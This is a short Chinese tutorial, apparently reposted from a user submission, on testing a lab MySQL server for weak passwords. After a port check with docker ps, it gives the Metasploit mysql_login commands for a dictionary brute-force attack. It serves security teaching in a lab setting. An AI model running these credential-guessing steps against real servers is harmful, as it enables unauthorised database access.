Web安全：MySQL数据库的弱口令漏洞测试.

Web安全：MySQL数据库的弱口令漏洞测试.

MySQL是一种关系型数据库管理系统，关系数据库将数据保存在不同的表中，而不是将所有数据放在一个大仓库内，这样就增加了速度并提高了灵活性。MySQL所使用的 SQL 语言是用于访问数据库的最常用标准化语言。MySQL 软件采用了双授权政策，分为社区版和商业版，由于其体积小、速度快、总体拥有成本低，尤其是开放源码这一特点，一般中小型和大型网站的开发都选择 MySQL 作为网站数据库.

目录：

Web安全：MySQL数据库的弱口令漏洞测试.

MySQL数据库的弱口令漏洞测试：

第一步：查看 MySQL 数据库的端口.（默认端口是 3306 ）

第二步：利用字典进行破解.（使用 msf 控制台）

MySQL数据库的弱口令漏洞测试：

第一步：查看 MySQL 数据库的端口.（默认端口是 3306 ）

由于 靶场 的 MySQL 服务端口 3306 映射为主机的 13307 端口.docker ps     // 查看主机 映射端口.

其他 查看端口的方法,可以使用端口扫描工具 nmap 等等...

第二步：利用字典进行破解.（使用 msf 控制台）

msfconsole                //进入msf的控制台.

use auxiliary/scanner/mysql/mysql_login        //使用 MySQL 暴力破解脚本 mysql_login

show options        \\使用show options命令显示暴力破解的参数.

set RHOSTS 192.168.0.101            //配置 MySQL 服务器的 IP 地址.set RPORT 13307                     //配置 MySQL 服务器端口.(默认3306，如果不是这个则修改)set PASS_FILE /root/root.txt        //配置 字典 进行破解的路径.

run                //进行测试.

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！